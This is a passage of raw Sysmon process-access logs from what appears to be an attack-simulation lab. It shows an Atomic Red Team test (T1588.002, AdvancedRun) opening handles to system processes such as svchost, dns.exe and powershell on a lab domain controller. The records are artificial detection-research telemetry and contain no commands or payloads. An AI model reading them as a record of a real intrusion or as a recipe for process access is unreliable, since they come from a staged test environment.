588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983832Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8204-000000002702}2220C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983831Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983830Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F46C-61EA-8004-000000002702}592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983829Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983828Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F419-61EA-6A04-000000002702}4528C:\Windows\servicing\TrustedInstaller.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983826Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983825Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983824Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983823Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3300-000000002702}2488C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983822Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983821Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983820Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983819Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983818Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983817Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c